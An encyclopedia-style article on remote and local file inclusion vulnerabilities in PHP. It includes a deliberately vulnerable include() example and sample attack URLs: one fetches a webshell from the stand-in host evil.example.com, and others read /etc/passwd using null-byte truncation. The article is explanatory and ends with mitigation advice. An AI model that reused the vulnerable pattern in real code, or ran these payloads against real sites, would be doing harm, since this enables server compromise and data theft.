File inclusion vulnerability
File inclusion vulnerability is a type of vulnerability most often found on websites. It allows an attacker to include a file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation. This can lead to something as minimal as outputting the contents of the file or more serious events such as:
- Code execution on the web server
- Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS)
- Denial of service (DoS)
- Data theft/manipulation
Types of inclusion
Remote File Inclusion
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.
Local File Inclusion
Local File Inclusion (LFI) is similar to a Remote File Inclusion vulnerability except instead of including remote files, only local files i.e. files on the current server can be included. The vulnerability is also due to the use of user-supplied input without proper validation.
Programming languages
PHP
In PHP the main cause is due to the use of unvalidated external variables such as $_GET, $_POST, $_COOKIE with a filesystem function. Most notable are the include
and require
statements. Most of the vulnerabilities can be attributed to novice programmers not being familiar with all of the capabilities of the PHP programming language. The PHP language has an allow_url_fopen
directive which, if enabled, allows filesystem functions to use a URL to retrieve data from remote locations.[1] An attacker will alter a variable that is passed to one of these functions to cause it to include malicious code from a remote resource. To mitigate this vulnerability all user input needs to be validated before being used.[2][3]
Example
Consider this PHP script which includes a file specified by request:
<?php
if ( isset( $_GET['COLOR'] ) ) {
include( $_GET['COLOR'] . '.php' );
}
?>
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
The developer intended only blue.php and red.php to be used as options. But it is possible to inject code from other files as anyone can insert arbitrary values for the COLOR
parameter.
-
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
- injects a remotely hosted file containing a malicious code. -
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
- Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability) -
/vulnerable.php?COLOR=C:\\notes.txt%00
- example using NULL meta character to remove the.php
suffix, allowing access to files other than .php. (Enabling magic_quotes_gpc limits the attack by escaping special characters, thus disabling the use of the NUL terminator) -
/vulnerable.php?COLOR=/etc/passwd%00
- allows an attacker to read the contents of the passwd file on a UNIX system directory traversal.
Solutions to this include filtering or validation of the passed-in path to make sure it does not contain unintended characters and character patterns. However, this may require anticipating all possible problematic character combinations. A safer solution is to use a predefined Switch/Case statement to determine which file to include rather than use a URL or form parameter to dynamically generate the path.
See also
- Attack (computing)
- Code injection
- Metasploit Project, an open-source penetration testing tool that includes tests for RFI
- SQL injection
- Threat (computer)
- w3af, an open-source web application security scanner
References
- ↑ "Using remote files". PHP. Retrieved March 3, 2013.
- ↑ "Remote File Inclusion". The Web Application Security Consortium. Retrieved March 3, 2013.
- ↑ "CWE-98: Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion')". Common Weakness Enumeration (CWE). Mitre. Retrieved March 3, 2013.
External links
- Remote File Inclusion at the Web Application Security Consortium
- Local File Inclusion